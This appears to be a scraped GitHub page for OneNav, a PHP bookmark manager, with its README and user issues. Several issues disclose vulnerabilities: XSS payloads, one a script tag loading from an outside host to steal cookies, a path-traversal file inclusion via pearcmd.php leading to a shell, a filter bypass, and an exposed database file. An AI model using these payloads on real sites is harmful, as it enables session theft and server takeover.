helloxz / onenav Goto Github PK

View Code? Open in Web Editor NEW

2.1K 20.0 426.0 7.84 MB

使用PHP + SQLite 3开发的书签管理系统，将浏览器书签集中式管理，做到一处部署，随处访问。

Home Page: https://www.onenav.top

License: Apache License 2.0

PHP 24.40% HTML 0.01% Hack 0.52% JavaScript 42.12% CSS 32.22% SCSS 0.74%

php bookmark navigation

onenav's Introduction

OneNav

中文 | English

OneNav是一款开源免费的书签（导航）管理程序，使用使用PHP + SQLite 3开发，界面简洁，安装简单，使用方便。OneNav可帮助你将浏览器书签集中式管理，解决跨设备、跨平台、跨浏览器之间同步和访问困难问题，做到一处部署，随处访问。

特别声明：未经作者允许，请勿将OneNav进行获利行为或进行商业行为，亦不得用于非法用途，否则自行承担相应法律责任！！！

功能特色

支持后台管理
支持私有链接
支持Chrome/Firefox/Edge书签批量导入
支持多种主题风格
支持链接信息自动识别
支持API
支持Docker部署
支持uTools插件
支持二级分类
支持Chromium内核的浏览器扩展（插件）
支持在线更新
手机版后台

安装

常规安装：

需安装PHP环境，并确保支持SQLite3
下载源码解压到站点根目录
访问首页根据提示初始化用户名/密码
访问后台：http://IP/index.php?c=login

Docker部署：

docker run -itd --name="onenav" -p 80:80 \
    -v /data/onenav:/data/wwwroot/default/data \
    helloz/onenav:0.9.34

第一个80是自定义访问端口，可以自行修改，第二个80是容器端口，请勿修改
/data/onenav：本机挂载目录，用于持久存储Onenav数据
0.9.34：改成OneNav最新版本号，可以通过releases查看最新版本号

更多说明，请参考帮助文档：https://dwz.ovh/onenav

Demo

官方演示站点：http://demo.onenav.top/
账号/密码：xiaoz/xiaoz.me

以下是OneNav部分用户演示站，排名不分先后。

OneNav：https://nav.rss.ink/
千行书签：http://www.52qx.club/
纽及书签：http://www.1006788.com/
DiscoveryNav：https://nav.miooku.com/

OneNav交流群

https://dwz.ovh/qxsul

鸣谢

感谢@百素/@itushan的代码贡献及主题开发，以及其它OneNav贡献者和使用者，名字太多无法一一列举，还请谅解。

OneNav诞生离不开以下项目，在此表示感谢（排名不分先后）。

onenav's People

Contributors

Stargazers

Watchers

Forkers

youmuyou miszzzhou 33103 mengxiangke showerxu tianya2002 doukei wxkeykey zxhycxq awesome-archive pyzmxu myhenji zixiwangluo huaxing211 laputaer ajun59420 bapigso codesbuff aintyz uubxs eamon-cai nosoxo kuqihanyan chancat87 cnmir2 kangyupeng hkxiaoyao white52 final-vip q1034080962 wanghongice pigflyflyfly whitestorys liuhaonan2003 djfbob yiyinyiyang xrmm gcmscn caojingbiao eehello black0592 lyway fm518 hkylin ldxw yaalon igooglevip malygos-light qnyblog redweiweb alex9027 shaohan0228 cnxingyu freehost i-xochitl shuaisheng glory1213 miven mmvc175 ullaaaa yongbozhu supbose cumtsd lioarther codecopy xinqinglhj qpasnh paulchan2008 mcblog wfyihai baikele litanid turboceo houjunyong bfyskuy free-nav protonuniverse sun520999 flynn0 adrninistrators zidingz changsongyang 51sec chiheyuanfang spysir fdbucket shenliehuozhi numiame show00 yanyu4489 qidouhai chareasy cnantol a1007479270 lovebingo gtzh codelover-dev xuzhibin zhangdongdong7 tubuxing

onenav's Issues

更改favicon为本地

代码中的获取不了，自己在网上找了方法修改了一下。
源码 https://github.com/owen0o0/getFavicon

效果 https://www.daohangweb.com

在模版index.php中找到如下代码：
<img src="https://favicon.rss.ink/v1/<?php echo base64($link['url']); ?>" alt="HUAN" width="16" height="16" /> 修改成 <img src="/favicon/<?php echo $link['url']; ?>" alt="HUAN" width="16" height="16" />
另外也建议把一些在线的css文件都改成本。

移动端进入管理页面显示问题

左边侧栏无法缩进，导致右边显示不全，是我手机问题吗？

arm64 docker部署helloz/onenav:dev-0.9.13报错

2022/02/15 22:47:45 [alert] 13#13: setrlimit(RLIMIT_NOFILE, 100000) failed (1: Operation not permitted)

2022/02/15 22:47:45 [alert] 12#12: setrlimit(RLIMIT_NOFILE, 100000) failed (1: Operation not permitted)

2022/02/15 22:47:45 [alert] 14#14: setrlimit(RLIMIT_NOFILE, 100000) failed (1: Operation not permitted)

2022/02/15 22:47:45 [alert] 16#16: setrlimit(RLIMIT_NOFILE, 100000) failed (1: Operation not permitted)

页面书签搜索时，同时匹配URL

非根目录

不是根目录无法登录，有谁知道怎么解决吗？

建议增加自定义网址 logo 并可以通过拼音首字母检索

新增一个填入 png JPG链接入口部分网站没有图标谢谢
还想通过拼音首字母检索或者自己添加关键词通过关键词检索
谢谢

增加全局密码登陆功能

私人书签不想他人看到，增加一个全局登陆用户和密码，进后台就不需要密码

OneNav's add link function exists xss vul

add link function path

input xss payload 1 :"><script>alert("XSS")</script>

click 添加 button

alert xss success
input xss payload 2:<sCRiPt sRC=//xss.pt/NZ9j></sCrIpT>

Get user cookie success

导入书签提示：请求上传接口出现异常

Trying to get in touch regarding a security issue

Hey there!

I'd like to report a security issue but cannot find contact instructions on your repository.

If not a hassle, might you kindly add a SECURITY.md file with an email, or another contact method? GitHub recommends this best practice to ensure security issues are responsibly disclosed, and it would serve as a simple instruction for security researchers in the future.

Thank you for your consideration, and I look forward to hearing from you!

(cc @huntr-helper)

莫名奇妙的cookie问题

该网页无法正常运作guangsudalao.ga
将您重定向的次数过多。
尝试清除 Cookie.
ERR_TOO_MANY_REDIRECTS

问题是我也没有禁止Cookie啊
从安装到现在才开始出现的问题

一个国外的书签网址推荐，可以参考借鉴(支持拖动和rss)

一个国外的书签网址推荐，可以参考借鉴(支持拖动和rss)
https://about.start.me/

夜间模式支持

考虑夜间模式支持不？尤其手机模式下，晚上用比较扎眼:)

数据接口请求异常：parsererror

分类接口

数据接口请求异常：parsererror

希望增加离线资源，用作内网导航。目前在离线环境完全不可用。

[建议]设置主题参数时使用下拉框选项

列表界面可以记录本地的设置参数

比如我设置了一页显示50条，但是切几个页面，回来发现没有用，设置又恢复到了原来的系统默认。
如果可以记录一下我的设置就好了，哪怕是本地的缓存也行啊

OneNav has directory traversal with file inclusion that can lead to Getshell

漏洞简介 Vulnerability Introduction

由于index.php存在拼接且未经过滤的可控参数文件包含，可以进行路径穿越包含php原生pearcmd.php导致写入恶意文件Getshell。

Due to the inclusion of spliced and unfiltered controllable parameter files in index.php, path traversal can be performed to include php native pearcmd.php resulting in the writing of the malicious file getshell.

登陆后关闭浏览器后再进入不显示输入账号密码

这会有隐私泄露风险

迁移新服务器后添加修改链接显示The URL already exists!

迁移新服务器后显示链接正常，但是添加或者修改链接显示 The URL already exists! 大大，这是什么情况阿，写不进数据库了鸭

V0.9.13 分类图标异常的修复方案

修复方案:
编辑/class/Api.php 如图所示,去除name的htmlspecialchars转换,并保存
搜索 htmlspecialchars($name,ENT_QUOTES)
提替换为 $name
重新添加分类或者进入编辑重新保存!
注:作者应该是想防止XSS加的代码

或者在主题模板添加相应的解码函数.
文件 /templates/default/index.php
搜索 <?php echo $category['name']; ?>
替换为<?php echo htmlspecialchars_decode($category['name']); ?>
如果有其他主题,都需要修改一遍!

分类图标

前台分类前面的图标是在哪里设置的？

有很多网站识别不出来title和description，比如

http://weibodang.cn/，望修复

何时支持PHP 8

大佬，什么时候才能支持PHP8呀。

要是能在首页通过拖动形式改变排序就好了

如题，东西多的时候，后台调整权重实在是。。。太残了

批量设置分类、权重

链接有点多，移动起来麻烦

建议增加一个网址有效性检测

我的链接右上角那位置挺适合的

项目无法在网站非根目录下运行的问题

针对这个项目无法在网站非根目录下运行的问题，我大致上阅读了一遍你的项目代码，然后做出了相应改动，我在本地以及部署到服务器上测试过，均可以正常运行（不过对于部署在子目录的用户，可能需要更改一下项目.htaccess内的配置），你可以阅读一下这些改动，如果有问题的话可以留言，不过我不常上GitHub，如果想快速联系到我，可以给我发邮件（2291200076 at qq.com）感觉你这个项目还是挺实用的，希望能看到这个项目变得越来越好，继续加油！

以下是一些改动：

API问题

使用c=api&method=add_link添加链接时候
为何总提示fid不存在？0和19都不行。
![image](https://user-images.githubusercontent.com/57182325/167308272-fdf79abb-4c4c-40ac-a1d4-8b3282813435.jpeg

默认主题点击分类跳转问题

在默认主题的情况下，点击分类会跳转到对应的分类下，但是顶栏会将该分类的名称和介绍挡住。

V0.9.13 分类设置图标不能识别

全新安装的程序，出现此问题，不是模板原因，默认模板也不能识别，求解。

移动端无法看到登陆入口

如题，只有手动加上index.php?c=login才能登陆，并且登陆之后，菜单挤在一起了，难以点回首页
设备是ip12pm

我的链接可以批量导出，那能不能批量导入。

从书签导入后还需要重新调整分类，在表格中可以直接设置好分类，权重等，比较方便。

增加https支持?

请问有没有考虑做成两级导航

就是首页基础上，加个详情页，再跳转出去。

对于B站连接要是能获取UP头像就好了

【建议】在后台能否实现一键升级功能

在后台能否实现一键升级功能 , 这样就会省去很多麻烦

chrome扩展快捷键搜索、添加书签

很多场景下是在搜索书签，不知Onenav书签扩展可否实现类似Vimium快捷键功能，通过快捷键Shift+B快速搜索书签，如果有的话将会非常方便

静态文件未放入源码,无法内网部署

静态文件全都是连接到你的https://libs.xiaoz.top/ ,无法内网部署

!!!大量数据查询耗时

数据量大时，查询有些耗时，能不能做到按需检索，不要一次性全部检索

使用docker部署的话，怎么修改主题呢

希望能加个暗色模式

现在已经做的很好了，就差个暗色模式（自动切换和手动切换按钮），现在晚上用太刺眼了

一些建议..

1.能否增加多用户支持.以这种方式呈现.http://host/user1
2.能否支持拖拽排序...好像已经有人提过了
3.能否出个完整版的..即js.css等资源本地化.配置文件可以自定义静态资源的路径
4.能否支持下图标缓存..书签一多加载图标都要好久
5.支持非根目录运行..子目录无法运行..

部署在阿里云虚拟主机上无法使用

部署在阿里云虚拟主机，看起来链接跳转有点问题，貌似是不支持.htacess文件。
现象是一直跳转到初始化设置密码页面。类似这样 xxx.com/?username=q&password=q&password2=q
我的部署方法是直接下载文件，解压上传到ftp
能否考虑设置在这种场景下，使用完整的url

embed.js生成二维码url错误，无法适应关闭过度页，另建议分类增加自定义颜色以及网站描述可配置不显示

domain = protocol + port + hostname;
应该为
domain = protocol + hostname + port;
加判断端口是否为80和443再加冒号

OneNav's filtering for directory traversal can be bypassed leading to getshell

Vulnerability Introduction

A controlled file inclusion vulnerability with the number CVE-2022-26276 has been fixed in OneNav v0.9.15 by replacing ../ and ./ to empty, we can bypass the filter and use the previous payload to get shell.

The issue link for CVE-2022-26276 is: #44

Impact version: OneNav v0.9.15 - v0.9.17

I have sent you specific vulnerability details.

I download this cms and i first install it .

index.php:

if( !file_exists('./data/config.php') ) {
	exit('<h3>配置文件不存在，请将站点目录下的config.simple.php复制为data/config.php</h3>');
}
//检查数据库是否存在，不存在则复制数据库
if( !file_exists('./data/onenav.db3') ) {
	copy('db/onenav.simple.db3','data/onenav.db3');
	// copy('db/.htaccess','data/.htaccess');
}

//载入配置文件
require("./data/config.php");

//根据不同的请求载入不同的方法
//如果没有请求控制器
if((!isset($c)) || ($c == '')){
	//载入主页
    include_once("./controller/index.php");
    
}

else{
	include_once("./controller/".$c.'.php');
}

bug code :

if( !file_exists('./data/onenav.db3') ) {
	copy('db/onenav.simple.db3','data/onenav.db3');

then i try to require "./data/onenav.db3" and "/data/.htaccess" http response status 200

it means i can download onenav.db3 and

can gets some privacy information

you can add some random code to document name or sqlite database name .

this cms has many users.

关于链接描述和链接url

建议增加链接url展示功能 , 链接url和链接描述可以通过开关来配置是否显示